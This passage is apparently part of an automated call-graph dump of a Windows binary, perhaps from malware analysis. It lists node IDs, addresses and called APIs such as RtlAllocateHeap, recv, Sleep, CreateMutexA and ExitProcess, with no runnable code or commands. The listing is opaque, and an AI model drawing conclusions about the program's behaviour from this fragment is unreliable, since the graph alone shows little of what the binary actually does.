RtlAllocateHeap 10942->10943 10945 4a859a 10943->10945 10944->10941 10944->10945 10945->10869 10947 4a8433 10946->10947 10948 4a844e 10947->10948 10950 4a8465 10947->10950 10949 4a75f6 __dosmaperr RtlAllocateHeap 10948->10949 10951 4a8453 10949->10951 10954 4a845e 10950->10954 10992 4a779f 10950->10992 10953 4a6c5a ___std_exception_copy RtlAllocateHeap 10951->10953 10953->10954 10954->10869 10956 4a825a 10955->10956 10957 4a779f RtlAllocateHeap 10956->10957 10958 4a8297 10957->10958 11005 4ad3c8 10958->11005 10960 4a830d 10960->10869 10962 4a8420 RtlAllocateHeap 10961->10962 10963 4a861b 10962->10963 10963->10869 10965 4a8707 10964->10965 10966 4a875d std::invalid_argument::invalid_argument 10964->10966 10965->10966 10967 4ac88e __cftof 4 API calls 10965->10967 10966->10870 10967->10965 10971 4ac733 10968->10971 10972 4ac743 10971->10972 10973 4ac76d 10972->10973 10974 4ac781 10972->10974 10983 4ac748 10972->10983 10975 4a75f6 __dosmaperr RtlAllocateHeap 10973->10975 10976 4a690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10974->10976 10977 4ac772 10975->10977 10978 4ac78c 10976->10978 10979 4a6c5a ___std_exception_copy RtlAllocateHeap 10977->10979 10980 4ac79c 10978->10980 10984 4ac7c8 __cftof 10978->10984 10979->10983 10981 4b2b7d __cftof RtlAllocateHeap 10980->10981 10982 4ac7b1 10981->10982 10982->10983 10986 4a75f6 __dosmaperr RtlAllocateHeap 10982->10986 10983->10934 10988 4ac7de __cftof 10984->10988 10991 4ac815 __cftof 10984->10991 10985 4a75f6 __dosmaperr RtlAllocateHeap 10985->10983 10986->10983 10987 4a75f6 __dosmaperr RtlAllocateHeap 10989 4ac87f 10987->10989 10988->10983 10988->10985 10990 4a6c5a ___std_exception_copy RtlAllocateHeap 10989->10990 10990->10983 10991->10983 10991->10987 10993 4a77c3 10992->10993 10994 4a77b4 10992->10994 10996 4a77b9 10993->10996 10997 4ab04b __cftof RtlAllocateHeap 10993->10997 10995 4a75f6 __dosmaperr RtlAllocateHeap 10994->10995 10995->10996 10996->10954 10998 4a77ea 10997->10998 10999 4a7801 10998->10999 11002 4a7a33 10998->11002 11001 4aadf5 ___free_lconv_mon RtlAllocateHeap 10999->11001 11001->10996 11003 4aadf5 ___free_lconv_mon RtlAllocateHeap 11002->11003 11004 4a7a42 11003->11004 11004->10999 11006 4ad3d8 11005->11006 11007 4ad3ee 11005->11007 11008 4a75f6 __dosmaperr RtlAllocateHeap 11006->11008 11007->11006 11010 4ad400 11007->11010 11009 4ad3dd 11008->11009 11011 4a6c5a ___std_exception_copy RtlAllocateHeap 11009->11011 11014 4ad439 11010->11014 11016 4ad467 11010->11016 11012 4ad3e7 11011->11012 11012->10960 11013 4ad485 11018 4ad4ae 11013->11018 11019 4ad4e4 11013->11019 11026 4ad2ff 11014->11026 11015 4ad48a 11031 4acbdf 11015->11031 11016->11013 11016->11015 11022 4ad4cc 11018->11022 11023 4ad4b3 11018->11023 11059 4acef8 11019->11059 11052 4ad0e2 11022->11052 11042 4ad23e 11023->11042 11027 4ad315 11026->11027 11028 4ad320 11026->11028 11027->11012 11029 4aa1f1 ___std_exception_copy RtlAllocateHeap 11028->11029 11030 4ad37b ___std_exception_copy 11029->11030 11030->11012 11032 4acbf1 11031->11032 11033 4a690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 11032->11033 11034 4acc05 11033->11034 11035 4acc0d 11034->11035 11036 4acc21 11034->11036 11037 4a75f6 __dosmaperr RtlAllocateHeap 11035->11037 11039 4acef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 11036->11039 11041 4acc1c __alldvrm __cftof _strrchr 11036->11041 11038 4acc12 11037->11038 11040 4a6c5a ___std_exception_copy RtlAllocateHeap 11038->11040 11039->11041 11040->11041 11041->11012 11043 4b31a8 RtlAllocateHeap 11042->11043 11044 4ad26c 11043->11044 11045 4b2c47 RtlAllocateHeap 11044->11045 11046 4ad29e 11045->11046 11047 4ad2a5 11046->11047 11048 4ad2de 11046->11048 11050 4ad2b7 11046->11050 11047->11012 11049 4acf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 11048->11049 11049->11047 11051 4ad16d GetPEB ExitProcess GetPEB RtlAllocateHeap 11050->11051 11051->11047 11053 4b31a8 RtlAllocateHeap 11052->11053 11054 4ad10f 11053->11054 11055 4b2c47 RtlAllocateHeap 11054->11055 11056 4ad147 11055->11056 11057 4ad16d GetPEB ExitProcess GetPEB RtlAllocateHeap 11056->11057 11058 4ad14e 11056->11058 11057->11058 11058->11012 11060 4acf10 11059->11060 11061 4b31a8 RtlAllocateHeap 11060->11061 11062 4acf29 11061->11062 11063 4b2c47 RtlAllocateHeap 11062->11063 11064 4acf6e 11063->11064 11065 4acf75 11064->11065 11066 4acf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 11064->11066 11065->11012 11066->11065 11068 479080 11067->11068 11069 487a00 RtlAllocateHeap 11068->11069 11070 47908f 11069->11070 11071 475c10 4 API calls 11070->11071 11072 47909a 11071->11072 11073 4880c0 RtlAllocateHeap 11072->11073 11074 4790ec 11073->11074 11075 488220 RtlAllocateHeap 11074->11075 11076 4790fe shared_ptr 11075->11076 11077 47917e shared_ptr std::invalid_argument::invalid_argument 11076->11077 11078 4a6c6a RtlAllocateHeap 11076->11078 11077->10703 11079 4791aa 11078->11079 11081 488248 11080->11081 11082 488292 11080->11082 11081->11082 11083 488251 11081->11083 11085 488f40 RtlAllocateHeap 11082->11085 11087 4882a1 11082->11087 11088 489280 11083->11088 11085->11087 11086 48825a 11086->10707 11087->10707 11089 489294 11088->11089 11092 4892a5 __cftof 11089->11092 11093 4894e0 11089->11093 11091 48932b 11091->11086 11092->11086 11094 489619 11093->11094 11095 48950b 11093->11095 11096 489270 RtlAllocateHeap 11094->11096 11098 489579 11095->11098 11099 489552 11095->11099 11097 48961e 11096->11097 11100 472480 RtlAllocateHeap 11097->11100 11104 48d3e2 RtlAllocateHeap 11098->11104 11106 489563 __cftof 11098->11106 11099->11097 11101 48955d 11099->11101 11100->11106 11103 48d3e2 RtlAllocateHeap 11101->11103 11102 4a6c6a RtlAllocateHeap 11105 489628 shared_ptr 11102->11105 11103->11106 11104->11106 11105->11091 11106->11102 11107 4895e1 shared_ptr __cftof 11106->11107 11107->11091 11123 471000 11124 48d64e RtlAllocateHeap 11123->11124 11125 47100a 11124->11125 11136 472e00 11137 472e28 11136->11137 11140 48c68b 11137->11140 11143 48c3d5 11140->11143 11142 472e33 11144 48c3e1 11143->11144 11145 48c3eb 11143->11145 11146 48c3be 11144->11146 11148 48c39e 11144->11148 11145->11142 11156 48cd0a 11146->11156 11148->11145 11152 48ccd5 11148->11152 11150 48c3d0 11150->11142 11153 48c3b7 11152->11153 11154 48cce3 InitializeCriticalSectionEx 11152->11154 11153->11142 11154->11153 11157 48cd1f RtlInitializeConditionVariable 11156->11157 11157->11150 11179 47a418 11180 47a420 shared_ptr 11179->11180 11181 47a4f3 shared_ptr 11180->11181 11182 47a93f 11180->11182 11185 4880c0 RtlAllocateHeap 11181->11185 11183 4a6c6a RtlAllocateHeap 11182->11183 11184 47a944 11183->11184 11186 4a6c6a RtlAllocateHeap 11184->11186 11187 47a903 11185->11187 11188 47a949 11186->11188 11189 47a94e 11188->11189 11190 4a6c6a RtlAllocateHeap 11188->11190 11191 4a6c6a RtlAllocateHeap 11189->11191 11190->11189 11192 47a953 Sleep CreateMutexA 11191->11192 11193 47a98e 11192->11193 9899 4a6629 9902 4a64c7 9899->9902 9903 4a64d5 __cftof 9902->9903 9904 4a6520 9903->9904 9907 4a652b 9903->9907 9906 4a652a 9913 4aa302 GetPEB 9907->9913 9909 4a6535 9910 4a653a GetPEB 9909->9910 9911 4a654a __cftof 9909->9911 9910->9911 9912 4a6562 ExitProcess 9911->9912 9914 4aa31c __cftof 9913->9914 9914->9909 9915 4ad82f 9918 4ad83c __dosmaperr 9915->9918 9916 4ad867 RtlAllocateHeap 9917 4ad87a __dosmaperr 9916->9917 9916->9918 9918->9916 9918->9917 11212 471020 11213 4880c0 RtlAllocateHeap 11212->11213 11214 471031 11213->11214 11215 48d64e RtlAllocateHeap 11214->11215 11216 47103b 11215->11216 11310 47e0c0 recv 11311 47e122 recv 11310->11311 11312 47e157 recv 11311->11312 11313 47e191 11312->11313 11314 47e2b3 std::invalid_argument::invalid_argument 11313->11314 11315 48c6ac GetSystemTimePreciseAsFileTime 11313->11315 11316 47e2ee 11315->11316 11317 48c26a 5 API calls 11316->11317 11318 47e358 11317->11318 11260 472ec0 11261 472f06 11260->11261 11262 472f7e GetCurrentThreadId 11260->11262 11265 48c6ac GetSystemTimePreciseAsFileTime 11261->11265 11263 472fef 11262->11263 11264 472f94 11262->11264 11264->11263 11271 48c6ac GetSystemTimePreciseAsFileTime 11264->11271 11266 472f12 11265->11266 11267 47301e 11266->11267 11268 472f1d 11266->11268 11269 48c26a 5 API calls 11267->11269 11272 48d3e2 RtlAllocateHeap 11268->11272 11273 472f30 __Mtx_unlock 11268->11273 11270 473024 11269->11270 11274 48c26a 5 API calls 11270->11274 11275 472fb9 11271->11275 11272->11273 11273->11270 11276 472f6f 11273->11276 11274->11275 11277 48c26a 5 API calls 11275->11277 11278 472fc0 __Mtx_unlock 11275->11278 11276->11262 11276->11263 11277->11278 11279 48c26a 5 API calls 11278->11279 11280 472fd8 __Cnd_broadcast 11278->11280 11279->11280 11280->11263 11281 48c26a 5 API calls 11280->11281 11282 47303c 11281->11282 11283 48c6ac GetSystemTimePreciseAsFileTime 11282->11283 11292 473080 shared_ptr __Mtx_unlock 11283->11292 11284 4731c5 11285 48c26a 5 API calls 11284->11285 11286 4731cb 11285->11286 11287 48c26a 5 API calls 11286->11287 11288 4731d1 11287->11288 11289 48c26a 5 API calls 11288->11289 11297 473193 __Mtx_unlock 11289->11297 11290 4731a7 std::invalid_argument::invalid_argument 11291 48c26a 5 API calls 11294 4731dd 11291->11294 11292->11284 11292->11286 11292->11290 11293 473132 GetCurrentThreadId 11292->11293 11293->11290 11295 47313b 11293->11295 11295->11290 11296 48c6ac GetSystemTimePreciseAsFileTime 11295->11296 11298 47315f 11296->11298 11297->11290 11297->11291 11298->11284 11298->11288 11298->11297 11299 48bd4c GetSystemTimePreciseAsFileTime 11298->11299 11299->11298 11334 48d0c7 11335 48d0d7 11334->11335 11336 48d17f 11335->11336 11337 48d17b RtlWakeAllConditionVariable 11335->11337 11338 479adc 11339 479aea 11338->11339 11343 479afe shared_ptr 11338->11343 11340 47a917 11339->11340 11339->11343 11341 47a953 Sleep CreateMutexA 11340->11341 11342 4a6c6a RtlAllocateHeap 11340->11342 11344 47a98e 11341->11344 11342->11341 11345 487a00 RtlAllocateHeap 11343->11345 11346 479b74 11345->11346 11347 475c10 4 API calls 11346->11347 11348 479b7c 11347->11348 11361 478b30 11348->11361 11350 479b8d 11351 488220 RtlAllocateHeap 11350->11351 11352 479b9c 11351->11352 11353 487a00 RtlAllocateHeap 11352->11353 11354 479ca9 11353->11354 11355 475c10 4 API calls 11354->11355 11356 479cb1 11355->11356 11357 478b30 4 API calls 11356->11357 11358 479cc2 11357->11358 11359 488220 RtlAllocateHeap 11358->11359 11360 479cd1 11359->11360 11362 478b7c 11361->11362 11363 487a00 RtlAllocateHeap 11362->11363 11364 478b8c 11363->11364 11365 475c10 4 API calls 11364->11365 11366 478b97 11365->11366 11367 4880c0 RtlAllocateHeap 11366->11367 11368 478be3 11367->11368 11369 4880c0 RtlAllocateHeap 11368->11369 11370 478c35 11369->11370 11371 488220 RtlAllocateHeap 11370->11371 11373 478c47 shared_ptr 11371->11373 11372 478d01 shared_ptr std::invalid_argument::invalid_argument 11372->11350 11373->11372 11374 4a6c6a RtlAllocateHeap 11373->11374 11375 478d2d 11374->11375 11376 487a00 RtlAllocateHeap 11375->11376 11377 478d8f 11376->11377 11378 475c10 4 API calls 11377->11378 11379 478d9a 11378->11379 11380 4880c0 RtlAllocateHeap 11379->11380 11381 478dec 11380->11381 11382 488220 RtlAllocateHeap 11381->11382 11384 478dfe shared_ptr 11382->11384 11383 478e7e shared_ptr std::invalid_argument::invalid_argument 11383->11350 11384->11383 11385 4a6c6a RtlAllocateHeap 11384->11385 11386 478eaa 11385->11386 11387 487a00 RtlAllocateHeap 11386->11387 11388 478f0f 11387->11388 11389 475c10 4 API calls 11388->11389 11390 478f1a 11389->11390 11391 4880c0 RtlAllocateHeap 11390->11391 11392 478f6c 11391->11392 11393 488220 RtlAllocateHeap 11392->11393 11394 478f7e shared_ptr 11393->11394 11395 478ffe shared_ptr std::invalid_argument::invalid_argument 11394->11395 11396 4a6c6a RtlAllocateHeap 11394->11396 11395->11350 11397 47902a 11396->11397 11446 476ae9 11447 476b01 11446->11447 11448 4880c0 RtlAllocateHeap 11447->11448 11451 476bbd shared_ptr 11447->11451 11449 476bac 11448->11449 11450 489280 RtlAllocateHeap 11449->11450 11450->11451 11452 4880c0 RtlAllocateHeap 11451->11452 11453 476ce3 shared_ptr std::invalid_argument::invalid_argument 11452->11453 11454 489ef0 11455 489f0c 11454->11455 11456 48c68b __Mtx_init_in_situ 2 API calls 11455->11456 11457 489f17 11456->11457 11458 4b44f2 11459 4b44ff 11458->11459 11460 4b450c 11458->11460 11461 4a75f6 __dosmaperr RtlAllocateHeap 11459->11461 11462 4b4518 11460->11462 11463 4a75f6 __dosmaperr RtlAllocateHeap 11460->11463 11464 4b4504 11461->11464 11465 4b4539 11463->11465 11466 4a6c5a ___std_exception_copy RtlAllocateHeap 11465->11466 11466->11464 11467 47a682 11468 47a68a shared_ptr 11467->11468 11469 47a949 11468->11469 11470 47a75d shared_ptr 11468->11470 11471 47a94e 11469->11471 11472 4a6c6a RtlAllocateHeap 11469->11472 11474 4880c0 RtlAllocateHeap 11470->11474 11473 4a6c6a RtlAllocateHeap 11471->11473 11472->11471 11475 47a953 Sleep CreateMutexA 11473->11475 11476 47a903 11474->11476 11477 47a98e 11475->11477 11518 488680 11519 4886e0 11518->11519 11527 487760 11519->11527 11521 4886f9 11522 488f40 RtlAllocateHeap 11521->11522 11523 488714 11521->11523 11522->11523 11524 488f40 RtlAllocateHeap 11523->11524 11526 488769 11523->11526 11525 4887b1 11524->11525 11528 48777b 11527->11528 11540 487864 shared_ptr __cftof 11527->11540 11529 4878f1 11528->11529 11533 4877ea 11528->11533 11534 487811 11528->11534 11539 4877fb __cftof 11528->11539 11528->11540 11530 489270 RtlAllocateHeap 11529->11530 11531 4878f6 11530->11531 11532 472480 RtlAllocateHeap 11531->11532 11535 4878fb 11532->11535 11533->11531 11536 48d3e2 RtlAllocateHeap 11533->11536 11537 48d3e2 RtlAllocateHeap 11534->11537 11534->11539 11536->11539 11537->11539 11538 4a6c6a RtlAllocateHeap 11538->11529 11539->11538 11539->11540 11540->11521 11541 473c8e 11542 473c98 11541->11542 11543 473cb4 11542->11543 11544 472410 5 API calls 11542->11544 11547 473810 4 API calls 11543->11547 11545 473ca5 11544->11545 11546 473ce0 RtlAllocateHeap 11545->11546 11546->11543 11548 473ccf 11547->11548 11549 473810 4 API calls 11548->11549 11550 473cdb 11549->11550 11551 487d50 RtlAllocateHeap 11550->11551 11553 473d52 11550->11553 11551->11553 11552 48d3e2 RtlAllocateHeap 11554 473d84 11552->11554 11553->11552 11555 487d50 RtlAllocateHeap 11554->11555 11556 473e03 11554->11556 11555->11556 11557 473e9b shared_ptr 11556->11557 11558 4a6c6a RtlAllocateHeap 11556->11558 11559 473ec1 11558->11559 11567 475a9e 11570 475a61 11567->11570 11568 4880c0 RtlAllocateHeap 11568->11570 11570->11567 11570->11568 11571 487a00 RtlAllocateHeap 11570->11571 11572 475bdd std::invalid_argument::invalid_argument 11570->11572 11573 475730 11570->11573 11571->11570 11577 475860 shared_ptr 11573->11577 11581 475799 shared_ptr 11573->11581 11574 47592a 11582 488200 11574->11582 11576 4880c0 RtlAllocateHeap 11576->11581 11578 475900 shared_ptr std::invalid_argument::invalid_argument 11577->11578 11579 4a6c6a RtlAllocateHeap 11577->11579 11578->11570 11580 475934 11579->11580 11581->11574 11581->11576 11581->11577 11585 48c1d9 11582->11585 11584 48820a 11588 48c15d 11585->11588 11587 48c1ea std::_Throw_future_error 11587->11584 11589 4722e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11588->11589 11590 48c16f 11589->11590 11590->11587 11626 4720a0 11627 48c68b __Mtx_init_in_situ 2 API calls 11626->11627 11628 4720ac 11627->11628 11629 48d64e RtlAllocateHeap 11628->11629 11630 4720b6 11629->11630 11631 4734a0 11632 4734aa 11631->11632 11633 4734ca shared_ptr 11631->11633 11632->11633 11634 4a6c6a RtlAllocateHeap 11632->11634 11635 4734f2 Concurrency::cancel_current_task shared_ptr 11634->11635 11641 475cad 11643 475caf 11641->11643 11642 475d17 shared_ptr std::invalid_argument::invalid_argument 11643->11642 11644 4a6c6a RtlAllocateHeap 11643->11644 11645 475d47 __cftof 11644->11645 11645->11645 11646 4880c0 RtlAllocateHeap 11645->11646 11648 475e3e 11646->11648 11647 475ea6 shared_ptr std::invalid_argument::invalid_argument 11648->11647 11649 4a6c6a RtlAllocateHeap 11648->11649 11650 475ed2 11649->11650 11651 475ffe shared_ptr std::invalid_argument::invalid_argument 11650->11651 11652 4a6c6a RtlAllocateHeap 11650->11652 11653 47601b 11652->11653 11654 4880c0 RtlAllocateHeap 11653->11654 11655 476089 11654->11655 11656 4880c0 RtlAllocateHeap 11655->11656 11657 4760bd 11656->11657 11658 4880c0 RtlAllocateHeap 11657->11658 11659 4760ee 11658->11659 11660 4880c0 RtlAllocateHeap 11659->11660 11661 47611f 11660->11661 11662 4880c0 RtlAllocateHeap 11661->11662 11664 476150 11662->11664 11663 4765b1 shared_ptr std::invalid_argument::invalid_argument 11664->11663 11665 4a6c6a RtlAllocateHeap 11664->11665 11666 4765dc 11665->11666 11667 487a00 RtlAllocateHeap 11666->11667 11668 4766a6 11667->11668 11669 475c10 4 API calls 11668->11669 11670 4766ac 11669->11670 11671 475c10 4 API calls 11670->11671 11672 4766b1 11671->11672 11673 4722c0 4 API calls 11672->11673 11674 4766c9 shared_ptr 11673->11674 11675 487a00 RtlAllocateHeap 11674->11675 11676 476732 11675->11676 11677 475c10 4 API calls 11676->11677 11678 47673d 11677->11678 11679 4722c0 4 API calls 11678->11679 11688 476757 shared_ptr 11679->11688 11680 476852 11681 4880c0 RtlAllocateHeap 11680->11681 11683 47689c 11681->11683 11682 487a00 RtlAllocateHeap 11682->11688 11684 4880c0 RtlAllocateHeap 11683->11684 11686 4768e3 shared_ptr std::invalid_argument::invalid_argument 11684->11686 11685 475c10 4 API calls 11685->11688 11687 4722c0 4 API calls 11687->11688 11688->11680 11688->11682 11688->11685 11688->11687 11689 4742b0 11692 473ac0 11689->11692 11691 4742bb shared_ptr 11693 473af9 11692->11693 11694 4a6c6a RtlAllocateHeap 11693->11694 11699 473b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11693->11699 11695 473be6 11694->11695 11696 4732d0 6 API calls 11695->11696 11698 473c38 11695->11698 11696->11698 11697 4732d0 6 API calls 11701 473c5f 11697->11701 11698->11697 11698->11701 11699->11691 11700 473c68 11700->11691 11701->11700 11702 473810 4 API calls 11701->11702 11703 473cdb 11702->11703 11704 487d50 RtlAllocateHeap 11703->11704 11706 473d52 11703->11706 11704->11706 11705 48d3e2 RtlAllocateHeap 11707 473d84 11705->11707 11706->11705 11708 487d50 RtlAllocateHeap 11707->11708 11710 473e03 11707->11710 11708->11710 11709 473e9b shared_ptr 11709->11691 11710->11709 11711 4a6c6a RtlAllocateHeap 11710->11711 11712 473ec1 11711->11712 11713 479ab8 11715 479acc 11713->11715 11716 479b08 11715->11716 11717 487a00 RtlAllocateHeap 11716->11717 11718 479b74 11717->11718 11719 475c10 4 API calls 11718->11719 11720 479b7c 11719->11720 11721 478b30 4 API calls 11720->11721 11722 479b8d 11721->11722 11723 488220 RtlAllocateHeap 11722->11723 11724 479b9c 11723->11724 11725 487a00 RtlAllocateHeap 11724->11725 11726 479ca9 11725->11726 11727 475c10 4 API calls 11726->11727 11728 479cb1 11727->11728 11729 478b30 4 API calls 11728->11729 11730 479cc2 11729->11730 11731 488220 RtlAllocateHeap 11730->11731 11732 479cd1 11731->11732 11733 479f44 11734 479f4c shared_ptr 11733->11734 11735 47a92b 11734->11735 11738 47a01f shared_ptr 11734->11738 11736 47a953 Sleep CreateMutexA 11735->11736 11737 4a6c6a RtlAllocateHeap 11735->11737 11740 47a98e 11736->11740 11737->11736 11739 4880c0 RtlAllocateHeap 11738->11739 11741 47a903 11739->11741 11794 47a54d 11795 47a555 shared_ptr 11794->11795 11796 47a628 shared_ptr 11795->11796 11797 47a944 11795->11797 11800 4880c0 RtlAllocateHeap 11796->11800 11798 4a6c6a RtlAllocateHeap 11797->11798 11799 47a949 11798->11799 11801 47a94e 11799->11801 11802 4a6c6a RtlAllocateHeap 11799->11802 11803 47a903 11800->11803 11804 4a6c6a RtlAllocateHeap 11801->11804 11802->11801 11805 47a953 Sleep CreateMutexA 11804->11805 11806 47a98e 11805->11806 11807 47215a 11812 48c6fc 11807->11812 11810 48d64e RtlAllocateHeap 11811 47216e 11810->11811 11813 48c70c 11812->11813 11814 472164 11812->11814 11813->11814 11816 48cfbe 11813->11816 11814->11810 11817 48ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11816->11817 11818 48cfd0 11817->11818 11818->11813 11862 475f76 11864 475f81 shared_ptr 11862->11864 11863 475ffe shared_ptr std::invalid_argument::invalid_argument 11864->11863 11865 4a6c6a RtlAllocateHeap 11864->11865 11866 47601b 11865->11866 11867 4880c0 RtlAllocateHeap 11866->11867 11868 476089 11867->11868 11869 4880c0 RtlAllocateHeap 11868->11869 11870 4760bd 11869->11870 11871 4880c0 RtlAllocateHeap 11870->11871 11872 4760ee 11871->11872 11873 4880c0 RtlAllocateHeap 11872->11873 11874 47611f 11873->11874 11875 4880c0 RtlAllocateHeap 11874->11875 11877 476150 11875->11877 11876 4765b1 shared_ptr std::invalid_argument::invalid_argument 11877->11876 11878 4a6c6a RtlAllocateHeap 11877->11878 11879 4765dc 11878->11879 11880 487a00 RtlAllocateHeap 11879->11880 11881 4766a6 11880->11881 11882 475c10 4 API calls 11881->11882 11883 4766ac 11882->11883 11884 475c10 4 API calls 11883->11884 11885 4766b1 11884->11885 11886 4722c0 4 API calls 11885->11886 11887 4766c9 shared_ptr 11886->11887 11888 487a00 RtlAllocateHeap 11887->11888 11889 476732 11888->11889 11890 475c10 4 API calls 11889->11890 11891 47673d 11890->11891 11892 4722c0 4 API calls 11891->11892 11901 476757 shared_ptr 11892->11901 11893 476852 11894 4880c0 RtlAllocateHeap 11893->11894 11896 47689c 11894->11896 11895 487a00 RtlAllocateHeap 11895->11901 11897 4880c0 RtlAllocateHeap 11896->11897 11899 4768e3 shared_ptr std::invalid_argument::invalid_argument 11897->11899 11898 475c10 4 API calls 11898->11901 11900 4722c0 4 API calls 11900->11901 11901->11893 11901->11895 11901->11898 11901->11900 11902 472170 11903 48c6fc InitializeCriticalSectionEx 11902->11903 11904 47217a 11903->11904 11905 48d64e RtlAllocateHeap 11904->11905 11906 472184 11905->11906 11907 473970 11908 48c68b __Mtx_init_in_situ 2 API calls 11907->11908 11909 4739a7 11908->11909 11910 48c68b __Mtx_init_in_situ 2 API calls 11909->11910 11911 4739e6 11910->11911 11912 473770 11914 47379b 11912->11914 11913 4737cd shared_ptr 11914->11913 11915 4a6c6a RtlAllocateHeap 11914->11915 11916 47380f 11915->11916 11968 472b10 11969 472b1c 11968->11969 11970 472b1a 11968->11970 11971 48c26a 5 API calls 11969->11971 11972 472b22 11971->11972 11973 488510 11974 48855f 11973->11974 11976 48856c 11973->11976 11979 489d00 11974->11979 11977 4885c4 11976->11977 12000 48a060 11976->12000 11980 489e31 11979->11980 11984 489d25 11979->11984 11981 489270 RtlAllocateHeap 11980->11981 11993 489d8b __cftof 11981->11993 11982 4a6c6a RtlAllocateHeap 11991 489e3b 11982->11991 11983 489e2c 11985 472480 RtlAllocateHeap 11983->11985 11984->11983 11986 489d7a 11984->11986 11987 489da1 11984->11987 11985->11980 11986->11983 11988 489d85 11986->11988 11990 48d3e2 RtlAllocateHeap 11987->11990 11987->11993 11989 48d3e2 RtlAllocateHeap 11988->11989 11989->11993 11990->11993 11992 489e6a shared_ptr 11991->11992 11994 4a6c6a RtlAllocateHeap 11991->11994 11992->11976 11993->11982 11995 489dfc shared_ptr __cftof 11993->11995 11996 489e8e 11994->11996 11995->11976 11997 489ec0 shared_ptr 11996->11997 11998 4a6c6a RtlAllocateHeap 11996->11998 11997->11976 11999 489ee6 11998->11999 12001 48a1b1 12000->12001 12003 48a083 12000->12003 12002 489270 RtlAllocateHeap 12001->12002 12013 48a0e4 __cftof 12002->12013 12005 48a1ac 12003->12005 12006 48a0fd 12003->12006 12007 48a0d3 12003->12007 12004 4a6c6a RtlAllocateHeap 12012 48a1bb shared_ptr 12004->12012 12008 472480 RtlAllocateHeap 12005->12008 12011 48d3e2 RtlAllocateHeap 12006->12011 12006->12013 12007->12005 12009 48a0de 12007->12009 12008->12001 12010 48d3e2 RtlAllocateHeap 12009->12010 12010->12013 12011->12013 12012->11976 12013->12004 12014 48a16c shared_ptr __cftof 12013->12014 12014->11976 12015 48d111 12018 48d121 12015->12018 12016 48d12a 12018->12016 12019 48d199 12018->12019 12020 48d1a7 SleepConditionVariableCS 12019->12020 12022 48d1c0 12019->12022 12020->12022 12022->12018 12023 47211c 12024 472126 12023->12024 12025 48d64e RtlAllocateHeap 12024->12025 12026 472132 12025->12026 12027 4a6729 12030 4a6672 12027->12030 12029 4a673b 12033 4a667e __dosmaperr 12030->12033 12031 4a6685 12032 4a75f6 __dosmaperr RtlAllocateHeap 12031->12032 12034 4a668a 12032->12034 12033->12031 12035 4a66a5 12033->12035 12036 4a6c5a ___std_exception_copy RtlAllocateHeap 12034->12036 12037 4a66aa 12035->12037 12038 4a66b7 12035->12038 12043 4a6695 12036->12043 12040 4a75f6 __dosmaperr RtlAllocateHeap 12037->12040 12044 4aa8c3 12038->12044 12040->12043 12041 4a66c0 12042 4a75f6 __dosmaperr RtlAllocateHeap 12041->12042 12041->12043 12042->12043 12043->12029 12045 4aa8cf __dosmaperr 12044->12045 12048 4aa967 12045->12048 12047 4aa8ea 12047->12041 12053 4aa98a 12048->12053 12049 4ad82f __dosmaperr RtlAllocateHeap 12050 4aa9eb 12049->12050 12051 4aadf5 ___free_lconv_mon RtlAllocateHeap 12050->12051 12052 4aa9d0 12051->12052 12052->12047 12053->12049 12053->12052 12059 474120 12060 47416a 12059->12060 12062 4741b2 Concurrency::details::_ContextCallback::_CallInContext std::invalid_argument::invalid_argument 12060->12062 12063 473ee0 12060->12063 12064 473f1e 12063->12064 12065 473f48 12063->12065 12064->12062 12066 473f58 12065->12066 12069 472c00 12065->12069 12066->12062 12070 48d3e2 RtlAllocateHeap 12069->12070 12071 472c0e 12070->12071 12079 48b847 12071->12079 12073 472c42 12074 472c49 12073->12074 12085 472c80 12073->12085 12074->12062 12076 472c58 12088 472560 12076->12088 12078 472c65 std::_Throw_future_error 12080 48b854 12079->12080 12084 48b873 Concurrency::details::_Reschedule_chore 12079->12084 12091 48cb77 12080->12091 12082 48b864 12082->12084 12093 48b81e 12082->12093 12084->12073 12099 48b7fb 12085->12099 12087 472cb2 shared_ptr 12087->12076 12089 4a38af ___std_exception_copy RtlAllocateHeap 12088->12089 12090 472597 std::invalid_argument::invalid_argument 12089->12090 12090->12078 12092 48cb92 CreateThreadpoolWork 12091->12092 12092->12082 12094 48b827 Concurrency::details::_Reschedule_chore 12093->12094 12097 48cdcc 12094->12097 12096 48b841 12096->12084 12098 48cde1 TpPostWork 12097->12098 12098->12096 12100 48b817 12099->12100 12101 48b807 12099->12101 12100->12087 12101->12100 12103 48ca78 12101->12103 12104 48ca8d TpReleaseWork 12103->12104 12104->12100 12140 488320 12141 488339 12140->12141 12142 488f40 RtlAllocateHeap 12141->12142 12143 48834d 12141->12143 12142->12143 12144 476535 12146 476549 shared_ptr 12144->12146 12145 4a6c6a RtlAllocateHeap 12148 4765dc 12145->12148 12146->12145 12147 4765b1 shared_ptr std::invalid_argument::invalid_argument 12146->12147 12149 487a00 RtlAllocateHeap 12148->12149 12150 4766a6 12149->12150 12151 475c10 4 API calls 12150->12151 12152 4766ac 12151->12152 12153 475c10 4 API calls 12152->12153 12154 4766b1 12153->12154 12155 4722c0 4 API calls 12154->12155 12156 4766c9 shared_ptr 12155->12156 12157 487a00 RtlAllocateHeap 12156->12157 12158 476732 12157->12158 12159 475c10 4 API calls 12158->12159 12160 47673d 12159->12160 12161 4722c0 4 API calls 12160->12161 12163 476757 shared_ptr 12161->12163 12162 476852 12164 4880c0 RtlAllocateHeap 12162->12164 12163->12162 12165 487a00 RtlAllocateHeap 12163->12165 12168 475c10 4 API calls 12163->12168 12170 4722c0 4 API calls 12163->12170 12166 47689c 12164->12166 12165->12163 12167 4880c0 RtlAllocateHeap 12166->12167 12169 4768e3 shared_ptr std::invalid_argument::invalid_argument 12167->12169 12168->12163 12170->12163 12188 4721c0 12189 4721d0 12188->12189 12190 4721cb 12188->12190 12191 4721d4 12189->12191 12195 4721ec __cftof 12189->12195 12192 4a75f6 __dosmaperr RtlAllocateHeap 12191->12192 12193 4721d9 12192->12193 12196 4a6c5a ___std_exception_copy RtlAllocateHeap 12193->12196 12194 4721fc __cftof 12195->12194 12197 472221 12195->12197 12198 47223a 12195->12198 12199 4721e4 12196->12199 12200 4a75f6 __dosmaperr RtlAllocateHeap 12197->12200 12201 472231 12198->12201 12203 4a75f6 __dosmaperr 